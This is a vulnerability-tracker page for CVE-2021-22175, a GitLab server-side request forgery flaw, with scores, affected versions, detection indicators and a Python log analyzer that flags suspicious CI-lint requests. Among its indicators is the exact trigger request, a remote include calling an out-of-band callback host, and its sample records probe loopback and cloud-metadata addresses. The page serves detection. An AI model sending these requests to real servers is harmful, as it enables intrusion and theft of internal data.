CVE-2021-22175
published 2021-06-11

Priority P1 (93) · critical · CVSS 3.1 base score 9.8
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CISA Known Exploited Vulnerability, remediation due 2026-03-11
Exploited in the wild
EPSS: 53.37% (98.9th percentile)
When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab affecting all versions starting from 10.5 could be exploited by an unauthenticated attacker, even on a GitLab instance where registration is disabled.

Affected

8 ranges (four of the gitlab/gitlab entries carry no version range)

Vendor   Product   Version range              Fixed in
debian   gitlab    < 15.10.8+ds1-2 (sid)      15.10.8+ds1-2 (sid)
gitlab   gitlab    >= 10.5.0, < 13.6.7        13.6.7
gitlab   gitlab    >= 13.7.0, < 13.7.7        13.7.7
gitlab   gitlab    >= 13.8.0, < 13.8.4        13.8.4

Detection & IOCs (extracted from sources)

  • url: POST /api/v4/ci/lint HTTP/1.1
  • path: /api/v4/ci/lint
  • path: /api/v4/ci/lint?include_merged_yaml=true
  • command (JSON request body): {"include_merged_yaml":true,"content":"include:\n remote: 'http://{{interactsh-url}}/gitlab.yml'"}
  • Detect unauthenticated POST requests to /api/v4/ci/lint whose JSON body contains a 'remote:' key pointing at an internal or loopback address; this is the SSRF trigger endpoint for CVE-2021-22175.
  • Match HTTP 200 responses from /api/v4/ci/lint whose JSON body contains 'does not have valid YAML syntax!'; GitLab emits this after attempting to fetch the remote include, so it shows the SSRF was triggered.
  • Monitor unauthenticated POST requests to /api/v4/ci/lint with Content-Type: application/json, especially when the body sets 'include_merged_yaml' and carries a 'remote:' directive targeting internal network addresses.
  • Use out-of-band (OAST/interactsh) detection: if the GitLab server initiates an outbound HTTP request to an attacker-controlled host after receiving a crafted /api/v4/ci/lint POST, SSRF is confirmed.
  • Shodan/FOFA fingerprint for exposed GitLab instances: http.title:"GitLab"; use it to identify potentially vulnerable internet-facing instances.
  • The SSRF is only exploitable when 'requests to the internal network for webhooks' is enabled in the instance settings; with that option disabled the attack surface is significantly reduced.
  • The vulnerability affects all GitLab CE/EE versions starting from 10.5. The Debian security tracker records the fix as 15.10.8+ds1-2 in sid.
  • This CVE belongs to a cluster of related GitLab SSRF vulnerabilities fixed in separate patches; the detections above may also apply to CVE-2021-39935 and CVE-2021-22214, which share the same attack vector.
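The detection logic in the bullets above, as an added example that is not part of this page or of GitLab's own tooling: it runs over constructed proxy/WAF records (request line, headers, body, response) and flags POST /api/v4/ci/lint calls whose CI YAML pulls a remote include, grading them by whether the target is an internal address, whether the request was unauthenticated, and whether the 200 response carries the 'does not have valid YAML syntax!' marker that shows the fetch was attempted. The record layout, the authentication heuristic (PRIVATE-TOKEN or Authorization header, _gitlab_session cookie, private_token query parameter) and the sample responses are assumptions made for the example.

```python
import ipaddress
import json
import re
from urllib.parse import urlparse

CI_LINT_PATH = "/api/v4/ci/lint"
# Response fragment the published template matches on: GitLab emits it after
# trying (and failing) to fetch the remote include.
YAML_ERROR_MARKER = "does not have valid YAML syntax!"
# Any http(s) URL inside the submitted CI YAML; covers `remote: <url>` and the
# bare `include: <url>` string form.
URL_RE = re.compile(r"https?://[^\s'\"<>]+")


def classify_host(url):
    """'internal' for loopback/private/link-local/unspecified targets,
    'external' otherwise, None when the URL carries no host."""
    host = urlparse(url).hostname
    if not host:
        return None
    if host.lower() == "localhost":
        return "internal"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return "external"  # hostname; what it resolves to cannot be judged offline
    if ip.is_loopback or ip.is_private or ip.is_link_local or ip.is_unspecified:
        return "internal"
    return "external"


def is_authenticated(rec):
    """Assumed heuristic: PRIVATE-TOKEN or Authorization header, a
    _gitlab_session cookie, or a private_token query parameter."""
    headers = {k.lower(): v for k, v in rec.get("headers", {}).items()}
    if "private-token" in headers or "authorization" in headers:
        return True
    if "_gitlab_session" in headers.get("cookie", ""):
        return True
    return "private_token=" in urlparse(rec["path"]).query


def analyze(records):
    """One finding per POST /api/v4/ci/lint whose YAML pulls a remote include."""
    findings = []
    for rec in records:
        if rec["method"] != "POST" or urlparse(rec["path"]).path != CI_LINT_PATH:
            continue
        try:
            body = json.loads(rec.get("body") or "")
        except ValueError:
            continue
        content = body.get("content") if isinstance(body, dict) else None
        if not isinstance(content, str):
            continue
        urls = URL_RE.findall(content)
        if not urls:
            continue
        targets = {u: classify_host(u) for u in urls}
        unauth = not is_authenticated(rec)
        if "internal" in targets.values():
            severity = "high" if unauth else "medium"
        else:
            severity = "low" if unauth else "info"  # outbound-only (OAST-style) probe
        findings.append({
            "severity": severity,
            "unauthenticated": unauth,
            "targets": targets,
            "merged_yaml": bool(body.get("include_merged_yaml")),
            # 200 plus the marker means the server actually attempted the fetch
            "fetch_attempted": rec.get("status") == 200
            and YAML_ERROR_MARKER in (rec.get("response") or ""),
        })
    return findings


# Constructed records (not real traffic); bodies are logged as strings.
SAMPLE = [
    {   # unauthenticated probe at loopback; server answered with the marker
        "method": "POST", "path": CI_LINT_PATH + "?include_merged_yaml=true",
        "headers": {"Content-Type": "application/json"},
        "body": json.dumps({"include_merged_yaml": True,
                            "content": "include:\n  remote: 'http://127.0.0.1:8080/gitlab.yml'"}),
        "status": 200,
        "response": '{"status":"invalid","errors":["Included file `http://127.0.0.1:8080/gitlab.yml` does not have valid YAML syntax!"]}',
    },
    {   # authenticated lint of a public template: benign
        "method": "POST", "path": CI_LINT_PATH,
        "headers": {"PRIVATE-TOKEN": "glpat-REDACTED", "Content-Type": "application/json"},
        "body": json.dumps({"content": "include:\n  - remote: 'https://example.com/ci/base.yml'"}),
        "status": 200, "response": '{"status":"valid","errors":[]}',
    },
    {   # unauthenticated, link-local metadata address, rejected (no marker)
        "method": "POST", "path": CI_LINT_PATH,
        "headers": {"Content-Type": "application/json"},
        "body": json.dumps({"content": "include: 'http://169.254.169.254/latest/meta-data/'"}),
        "status": 400, "response": '{"message":"400 Bad request"}',
    },
    {"method": "GET", "path": "/api/v4/projects", "headers": {}, "body": "", "status": 200, "response": "[]"},
]

if __name__ == "__main__":
    for f in analyze(SAMPLE):
        print(f["severity"], f["unauthenticated"], f["fetch_attempted"], list(f["targets"]))
```

The hostname branch of classify_host deliberately stays "external": a public name can resolve to an internal address (or be rebound), so hostnames are only graded by the out-of-band check, which is why an unauthenticated external-only probe is still reported at low severity rather than dropped.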

CVSS provenance

Source          Version   Score   Severity   Vector
nvd             v3.1      9.8     CRITICAL   CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd             v2.0      6.8     MEDIUM     AV:N/AC:M/Au:N/C:P/I:P/A:P
osv                       9.8     CRITICAL
vulncheck                 6.8     MEDIUM
cisa                      9.8     CRITICAL
vendor_debian             6.8     MEDIUM